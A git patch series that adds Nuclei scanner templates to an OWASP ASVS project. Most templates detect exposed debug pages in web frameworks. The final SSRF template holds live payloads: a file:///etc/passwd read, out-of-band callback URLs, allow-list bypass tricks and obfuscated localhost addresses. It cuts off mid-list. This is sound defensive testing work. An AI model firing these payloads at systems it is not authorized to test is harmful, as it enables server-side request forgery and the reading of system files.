https://docs.browserless.io/docs/docker.html#securing-your-instance + metadata: + max-request: 1 + shodan-query: http.title:"browserless debugger" + tags: browserless,unauth,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "browserless debugger" + - "Click the ► button to run your code." + condition: or + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100fbc099737ef182029191e896b9806e610a162693a38bcbf4fabd84a3a064ce64022100cb27dd4e8aa539c21facd415d9a3d360e356988d5e4a4f33d57178e4d1602959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/debug/ampache-debug.yaml b/templates/workflows/misconfiguration/debug/ampache-debug.yaml new file mode 100644 index 0000000..864f52e --- /dev/null +++ b/templates/workflows/misconfiguration/debug/ampache-debug.yaml @@ -0,0 +1,34 @@ +id: ampache-debug + +info: + name: Ampache Debug Page + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"Ampache -- Debug Page" + tags: misconfig,ampache,debug + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/test.php?action=config' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ampache Debug" + + - type: status + status: + - 200 + +# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/debug/bottle-debug.yaml b/templates/workflows/misconfiguration/debug/bottle-debug.yaml new file mode 100644 index 0000000..efc4dd0 --- /dev/null +++ b/templates/workflows/misconfiguration/debug/bottle-debug.yaml @@ -0,0 +1,36 @@ +id: bottle-debug + +info: + name: Bottle debug mode enabled + author: viondexd + severity: info + reference: + - https://bottlepy.org/docs/dev/tutorial.html#debug-mode + metadata: + verified: true + max-request: 1 + shodan-query: html:"Sorry, the requested URL" + tags: bottle,exposure,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Sorry, the requested URL " + - " caused an error:" + condition: and + + - type: word + part: body + words: + - "'{{BaseURL}}'" + - "'{{BaseURL}}/'" + condition: or + +# digest: 4a0a00473045022012b6c62f22fdb55acfcc6273506038637071f337b450e4cc0f8950870e324624022100f75350502fd6d4b2c633ea8670b249e594b40748f5a1ca5df478d71059a6a64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/django-debug-detect.yaml b/templates/workflows/misconfiguration/django-debug-detect.yaml new file mode 100644 index 0000000..0b0a84e --- /dev/null +++ b/templates/workflows/misconfiguration/django-debug-detect.yaml @@ -0,0 +1,29 @@ +id: django-debug + +info: + name: Django Debug Configuration Enabled + author: dhiyaneshDK,hackergautam + severity: medium + description: Django debug configuration is enabled, which allows an attacker to obtain system configuration information such as paths or settings. + metadata: + max-request: 1 + tags: django,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/NON_EXISTING_PATH/" + + matchers-condition: and + matchers: + - type: word + words: + - URLconf defined + - Page not found + - Django tried these URL patterns, in this order + condition: and + + - type: status + status: + - 404 +# digest: 4a0a0047304502204a5ac1486faa3be8702801b635c79e5a565724d1843641c69a5a09d012b23233022100a2ce507b92c7ffc804f071bc47c76185c97613307e1e15be73a224a45da5fa6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-enabled.yaml b/templates/workflows/misconfiguration/laravel-debug-enabled.yaml new file mode 100644 index 0000000..1b0a861 --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-enabled.yaml @@ -0,0 +1,31 @@ +id: laravel-debug-enabled + +info: + name: Laravel Debug Enabled + author: notsoevilweasel + severity: medium + description: | + Laravel with APP_DEBUG set to true is prone to show verbose errors. + remediation: | + Disable Laravel's debug mode by setting APP_DEBUG to false. + metadata: + max-request: 1 + tags: debug,laravel,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/_ignition/health-check" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - can_execute_commands + + - type: status + status: + - 200 + +# digest: 4a0a00473045022021f5d4e0139f8896fd4f330b08e129cdf385a67aab51ba5516fafd4b4ff0335a022100d877024cf9f3def775870120ada78e34b730ef7acdf0c6b30f58fff4f9ec6549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-error.yaml b/templates/workflows/misconfiguration/laravel-debug-error.yaml new file mode 100644 index 0000000..9f775ad --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-error.yaml @@ -0,0 +1,26 @@ +id: laravel-debug-error + +info: + name: Larvel Debug Method Enabled + author: dhiyaneshDK + severity: medium + description: Larvel Debug method is enabled. + metadata: + max-request: 1 + tags: debug,laravel,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - Whoops! There was an error + + - type: status + status: + - 500 +# digest: 4b0a00483046022100a27980313b04765c0889cf3781ae98a717537c8bf226181548f1befb4b88bc0b022100b5c1947c8918d39d6a6e27b7917edc78bb098d331d886b26e3ac00da1603a76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml b/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml new file mode 100644 index 0000000..af8a6bd --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml @@ -0,0 +1,53 @@ +id: laravel-debug-infoleak + +info: + name: Laravel Debug Info Leak + author: pwnhxl + severity: medium + description: | + This template can be used to detect a Laravel debug information leak by making a POST-based request. + reference: + - https://github.com/dem0ns/improper/blob/master/laravel/5_debug/1.png + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cwe-id: CWE-215 + metadata: + verified: true + max-request: 1 + shodan-query: Laravel-Framework + fofa-query: app="Laravel-Framework" + tags: misconfig,laravel,debug,infoleak + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'vendor/laravel/framework/src/Illuminate/' + - 'MethodNotAllowedHttpException' + condition: and + + - type: word + part: body + words: + - 'DB_PASSWORD' + - 'REDIS_PASSWORD' + - 'MAIL_PASSWORD' + - 'ALIYUN_ACCESSKEYSECRET' + - 'ALIYUN_ACCESSKEYID' + - 'SMS_AUTH_TOKEN' + - 'APP_KEY' + condition: or + + - type: status + status: + - 405 + +# digest: 4a0a00473045022100efe35d703b8ce007284a549152d7642cbaa469dc719432098c9e359f0cdc9e5c02206f93a03a347968aef317624daa120c7827f1bdef918edeb7c5a7d9d50a968827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/logs/django-debug-exposure.yaml b/templates/workflows/misconfiguration/logs/django-debug-exposure.yaml new file mode 100644 index 0000000..31c6aaa --- /dev/null +++ b/templates/workflows/misconfiguration/logs/django-debug-exposure.yaml @@ -0,0 +1,33 @@ +id: django-debug-exposure + +info: + name: Django Debug Exposure + author: geeknik + severity: high + description: Django debug mode enabled exposes internal information. + reference: + - https://twitter.com/Alra3ees/status/1397660633928286208 + metadata: + max-request: 1 + tags: django,exposure + +http: + - method: POST + path: + - "{{BaseURL}}/admin/login/?next=/admin/" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: body + words: + - "DB_HOST" + - "DB_NAME" + - "DJANGO" + - "ADMIN_PASSWORD" + condition: and +# digest: 4a0a00473045022075f8eb23f058287e94f409e156c595d9a3160eeca81f66a83d61be4144301dc7022100a96b53e8b7688c50241e531c5e45dac6fb3788d27fce1f21ac315b1279ddbbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/logs/struts-debug-mode.yaml b/templates/workflows/misconfiguration/logs/struts-debug-mode.yaml new file mode 100644 index 0000000..f0c8fb6 --- /dev/null +++ b/templates/workflows/misconfiguration/logs/struts-debug-mode.yaml @@ -0,0 +1,23 @@ +id: struts-debug-mode + +info: + name: Apache Struts setup in Debug-Mode + author: pdteam + severity: low + description: Apache Struts debug mode is enabled. + metadata: + max-request: 1 + tags: logs,struts,apache,exposure,setup + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "" + - "" + condition: and +# digest: 4a0a00473045022100bf6dbd31ef92f8e1dc40fb686e16761845933696c79fb4bb1b2576a03644deb0022005dd1ca7689260b05edd0714b26365856dec3d802159866075540766f352e443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/logs/struts-problem-report.yaml b/templates/workflows/misconfiguration/logs/struts-problem-report.yaml new file mode 100644 index 0000000..2c1bfa9 --- /dev/null +++ b/templates/workflows/misconfiguration/logs/struts-problem-report.yaml @@ -0,0 +1,29 @@ +id: struts-problem-report + +info: + name: Apache Struts Dev Mode - Detect + author: dhiyaneshDK + severity: low + description: Multiple Apache Struts applications were detected in dev-mode. + reference: + - https://www.exploit-db.com/ghdb/4278 + metadata: + max-request: 1 + tags: struts,debug,edb,exposure,apache + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Struts Problem Report' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022072b2375b4cd9dbf2bcce90d71c72e6c52718019b361ce71eea5f617c6a3904e1022100dc2851ed0fcc38ac40f189bfbaef67f1afbef38a0e43466dfdd3eb6005efd6a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/php-debugbar-exposure.yaml b/templates/workflows/misconfiguration/php-debugbar-exposure.yaml new file mode 100644 index 0000000..ffb0fd2 --- /dev/null +++ b/templates/workflows/misconfiguration/php-debugbar-exposure.yaml @@ -0,0 +1,34 @@ +id: php-debugbar-exposure + +info: + name: Php Debug Bar - Exposure + author: ritikchaddha,pdteam + severity: medium + description: | + The DebugBar integrates easily in any projects and can display profiling data from any part of your application. It comes built-in with data collectors for standard PHP features and popular projects. + reference: + - https://hackerone.com/reports/1883806 + - http://phpdebugbar.com/ + - https://github.com/maximebf/php-debugbar + metadata: + verified: true + max-request: 2 + shodan-query: html:"phpdebugbar" + tags: hackerone,misconfig,php,phpdebug,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/_debugbar/open" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'contains(body_1, "phpdebugbar") && contains(body, "widget")' + - 'contains_all(body_2, "\"utime\"","\"datetime\"","{\"id") && contains(content_type_2, "application/json")' + condition: or + +# digest: 4a0a00473045022055cb94f2a7454c92dcfed134429b31582f5c4e40bd7915cb109f7e28c7d3c533022100f1b29be9749442a2831ed29e39e61e64b9050dfa755a41ec6bc38abf7abab8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/php-errors.yaml b/templates/workflows/misconfiguration/php-errors.yaml new file mode 100644 index 0000000..a5e9ee7 --- /dev/null +++ b/templates/workflows/misconfiguration/php-errors.yaml @@ -0,0 +1,47 @@ +id: php-errors + +info: + name: PHP errors + author: w4cky_,geeknik,dhiyaneshDK + severity: info + metadata: + max-request: 1 + shodan-query: http.title:"PHP warning" || "Fatal error" + tags: debug,php,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' + - '(?i)PHP (Warning|Error)' + - '(?m)^([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)<b>Parse error</b>' + - '(?i)syntax error, unexpected' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' + +# digest: 4a0a004730450220253c9cfefeec7f15310fe83d714b5ca6145b0a01cf27947bebe4b9de25acdf4e022100b95ea3ebd9a8458311947ef44210a5752d427f1f37e68bdf5dd996655e909702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/rekognition-image-validation.yaml b/templates/workflows/misconfiguration/rekognition-image-validation.yaml new file mode 100644 index 0000000..05ba29b --- /dev/null +++ b/templates/workflows/misconfiguration/rekognition-image-validation.yaml @@ -0,0 +1,35 @@ +id: rekognition-image-validation + +info: + name: Rekognition Image Validation Debug UI Panel - Detect + author: tess + severity: info + description: Rekognition Image Validation UI panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: title:"Rekognition Image Validation Debug UI" + tags: misconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Rekognition Image Validation Debug UI' + - 'Optional Parameters' + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402202a26973f550c3c1e20225cf9d1b1c1f86fe5893e2a251268dc359d728b940198022046667e4429e033c1cbe1214dfdfe344679e7e519f33734b2181b6921e54f80e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/sitecore-debug-page.yaml b/templates/workflows/misconfiguration/sitecore-debug-page.yaml new file mode 100644 index 0000000..6df095f --- /dev/null +++ b/templates/workflows/misconfiguration/sitecore-debug-page.yaml @@ -0,0 +1,27 @@ +id: sitecore-debug-page + +info: + name: SiteCore Debug Page + author: dhiyaneshDK + severity: low + description: SiteCore debug page is exposed. + metadata: + max-request: 1 + shodan-query: http.title:"Welcome to Sitecore" + tags: debug,sitecore,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/sitecore/'" + + matchers-condition: and + matchers: + - type: word + words: + - 'extranet\Anonymous' + + - type: status + status: + - 404 +# digest: 490a0046304402207e6cbaf4252b5bd45acfd358e91a711f5b4ba6c959fc48ba4bb1e37c3ae1937302207921ca078e2c9c6130e0a08d4cf967e17af3e4df80ac1404e166063d4ce167af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/struts-ognl-console.yaml b/templates/workflows/misconfiguration/struts-ognl-console.yaml new file mode 100644 index 0000000..8e5de87 --- /dev/null +++ b/templates/workflows/misconfiguration/struts-ognl-console.yaml @@ -0,0 +1,34 @@ +id: struts-ognl-console + +info: + name: Apache Struts - OGNL Console + author: DhiyaneshDK + severity: unknown + description: | + This development console allows the evaluation of OGNL expressions that could lead to Remote Command Execution + remediation: Restrict access to the struts console on the production server + reference: + - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java + metadata: + verified: true + max-request: 1 + shodan-query: html:"Struts Problem Report" + tags: apache,struts,ognl,panel,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}/struts/webconsole.html?debug=console' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to the OGNL console!' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100bb73b24e9ca24ea074ca1175b1d76e79d6f59f4c30644f2232dd1c3f7878d0cf0220703e23fa55255a8b6956da4755c05416f7527f199eb6a670a01d3bf9238dfe87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/symfony-debug.yaml b/templates/workflows/misconfiguration/symfony-debug.yaml new file mode 100644 index 0000000..3090850 --- /dev/null +++ b/templates/workflows/misconfiguration/symfony-debug.yaml @@ -0,0 +1,41 @@ +id: symfony-debug + +info: + name: Symfony Debug Mode + author: organiccrap,pdteam + severity: high + description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code. + reference: + - https://github.com/synacktiv/eos + metadata: + verified: true + max-request: 4 + shodan-query: http.html:"symfony Profiler" + tags: symfony,debug,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}' + - "{{BaseURL}}/admin_dev.php" + - "{{BaseURL}}/index_dev.php" + - "{{BaseURL}}/app_dev.php" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: header + words: + - 'x-debug-token-link:' + - '/_profiler/' + condition: and + case-insensitive: true + + - type: word + part: body + words: + - 'debug mode is enabled.' + - 'id="sfWebDebugSymfony"' + condition: or +# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/typo3-debug-mode.yaml b/templates/workflows/misconfiguration/typo3-debug-mode.yaml new file mode 100644 index 0000000..7dc0f51 --- /dev/null +++ b/templates/workflows/misconfiguration/typo3-debug-mode.yaml @@ -0,0 +1,31 @@ +id: typo3-debug-mode + +info: + name: TYPO3 Debug Mode Enabled + author: tess + severity: low + description: TYPO3 Debug Mode is enabled. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"TYPO3 Exception" + tags: typo3,debug,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TYPO3 Exception" + - "Uncaught TYPO3 Exception" + condition: or + + - type: status + status: + - 500 +# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml b/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml new file mode 100644 index 0000000..6879c7b --- /dev/null +++ b/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml @@ -0,0 +1,29 @@ +id: wamp-xdebug-detect + +info: + name: WAMP Xdebug - Detect + author: e_schultze_ + severity: info + description: WAMP Xdebug was detected. + reference: + - https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: debug,config,wamp,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/?phpinfo=-1" + + matchers: + - type: word + words: + - 'xdebug.remote_connect_backOnOn' + part: body + +# digest: 490a0046304402202fd3e9daa0910b6e85ff4e8f4c0390ff720a2b9e76a611ca001a710e847a1ceb022024e41677c8d971632e36456e587d3f7b23bd6cb15938f22be2cec8b9edc150e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/technologies/werkzeug-debugger-detect.yaml b/templates/workflows/technologies/werkzeug-debugger-detect.yaml new file mode 100644 index 0000000..0a3aefb --- /dev/null +++ b/templates/workflows/technologies/werkzeug-debugger-detect.yaml @@ -0,0 +1,22 @@ +id: werkzeug-debugger-detect + +info: + name: Werkzeug debugger console + author: pdteam + severity: info + metadata: + max-request: 1 + tags: tech,werkzeug + +http: + - method: GET + path: + - "{{BaseURL}}/console" + + matchers: + - type: word + words: + - "

Interactive Console

" + part: body + +# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml new file mode 100644 index 0000000..e1823e4 --- /dev/null +++ b/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -0,0 +1,32 @@ +id: jenkins-stack-trace + +info: + name: Detect Jenkins in Debug Mode with Stack Traces Enabled + author: Dheerajmadhukar + severity: low + description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled. + reference: + - https://hackerone.com/reports/221833 + metadata: + max-request: 1 + tags: jenkins,hackerone + +http: + - method: GET + path: + - "{{BaseURL}}/adjuncts/3a890183/" + + matchers-condition: and + matchers: + - type: word + words: + - "java.lang.StringIndexOutOfBoundsException" + - "String index out of range" + part: body + condition: and + + - type: status + status: + - 500 + +# digest: 4b0a0048304602210090ecedd6e0a611f869394ae2afb7ee2b8fff8fed8cbfff1998250e38da3c79b9022100968c144032a3920ab6ce1e034b707724c5ddc8697cb6c3b1514d1233d75f6022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From eb06e3149773f3960cb31c49c588381f1f396e80 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 13:49:21 +0000 Subject: [PATCH 086/129] Fix workflows --- .../logs/django-debug-exposure.yaml | 0 .../exposures/logs/pyramid-debug-toolbar.yaml | 31 +++++++++++++++++++ .../logs/struts-debug-mode.yaml | 0 .../logs/struts-problem-report.yaml | 0 4 files changed, 31 insertions(+) rename templates/workflows/{misconfiguration => exposures}/logs/django-debug-exposure.yaml (100%) create mode 100644 templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml rename templates/workflows/{misconfiguration => exposures}/logs/struts-debug-mode.yaml (100%) rename templates/workflows/{misconfiguration => exposures}/logs/struts-problem-report.yaml (100%) diff --git a/templates/workflows/misconfiguration/logs/django-debug-exposure.yaml b/templates/workflows/exposures/logs/django-debug-exposure.yaml similarity index 100% rename from templates/workflows/misconfiguration/logs/django-debug-exposure.yaml rename to templates/workflows/exposures/logs/django-debug-exposure.yaml diff --git a/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml b/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml new file mode 100644 index 0000000..8f82ce0 --- /dev/null +++ b/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml @@ -0,0 +1,31 @@ +id: pyramid-debug-toolbar + +info: + name: Pyramid Debug Toolbar + author: geeknik + severity: medium + description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application. + reference: + - https://github.com/Pylons/pyramid_debugtoolbar + metadata: + max-request: 1 + tags: pyramid,logs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/_debug_toolbar/" + + matchers-condition: and + matchers: + - type: word + words: + - "Pyramid Debug Toolbar" + - "Pyramid DebugToolbar" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502203726e298675935a1a75fbcbe9ce8316c4ae6ef30822fb311a5004539662e1798022100bc0f0f98f4fcb801279da72e8eca3bf8eae9c211edcf6e89ad9bfc35f8708b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/logs/struts-debug-mode.yaml b/templates/workflows/exposures/logs/struts-debug-mode.yaml similarity index 100% rename from templates/workflows/misconfiguration/logs/struts-debug-mode.yaml rename to templates/workflows/exposures/logs/struts-debug-mode.yaml diff --git a/templates/workflows/misconfiguration/logs/struts-problem-report.yaml b/templates/workflows/exposures/logs/struts-problem-report.yaml similarity index 100% rename from templates/workflows/misconfiguration/logs/struts-problem-report.yaml rename to templates/workflows/exposures/logs/struts-problem-report.yaml From ecbc37229d1ea03d94ab70e4400d854854b1e67a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 24 Mar 2024 09:04:15 +0330 Subject: [PATCH 087/129] Add status badges Signed-off-by: Hamed Salimian --- README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/README.md b/README.md index 3654252..a284005 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,8 @@ +[![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) +[![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F&label=Vulnerable%20Pages&url=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F)](https://snbig.github.io/Vulnerable-Pages/) + + # OWASP ASVS Security Evaluation Templates with Nuclei From fe53f0d6a1b76a2f540ea509e86c813b66134688 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 24 Mar 2024 09:25:26 +0330 Subject: [PATCH 088/129] Add status badges. Signed-off-by: Hamed Salimian --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a284005..96dbdc2 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ [![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) -[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F&label=Vulnerable%20Pages&url=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F)](https://snbig.github.io/Vulnerable-Pages/) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F&label=🎯Vulnerable%20Pages&url=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F)](https://snbig.github.io/Vulnerable-Pages/) # OWASP ASVS Security Evaluation Templates with Nuclei From d83e8d23cb768d033f624f8d418470700f909c1e Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Wed, 17 Apr 2024 13:28:35 +0000 Subject: [PATCH 089/129] Create 12.6.1.yaml --- templates/12.6.1.yaml | 117 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 117 insertions(+) create mode 100644 templates/12.6.1.yaml diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml new file mode 100644 index 0000000..7f94aa6 --- /dev/null +++ b/templates/12.6.1.yaml @@ -0,0 +1,117 @@ +id: ASVS-4-0-3-V12-6-1 + +info: + name: ASVS 12.6.1 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ + - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + tags: asvs,12.6.1 + description: | + Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. + +variables: + whiltelist_host: "http://google.com" + server_file: "file:///etc/passwd" + restricted_path: "/admin" + restricted_path_keyword: "Welcom to Admin Panel" + + +requests: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"{{server_file}}"} + + stop-at-first-match: true + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"http://{{interactsh-url}}"} + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"{{whiltelist_host}}.{{interactsh-url}}"} + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"{{whiltelist_host}}@{{interactsh-url}}"} + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"http://{{interactsh-url}}#{{whiltelist_host}}"} + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + + + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"http://{{localips}}/admin"} + + payloads: + localips: + - '0000:0000:0000:0000:0000:ffff:127.0.0.1' + - '0000:0000:0000:0000:0000:ffff:7f000001' + - '0177.0.0.01' + - '0177.0.0.1' + - '0177.0.1' + - '0177.0x0.1' + - '0177.1' + - '017700000001' + - '0:0:0:0:0:ffff:7f000001' + - '0x000000007f.0x000000000.0x000000000.0x000000001' + - '0x7f.0.0.1' + - '0x7f.0.1' + - 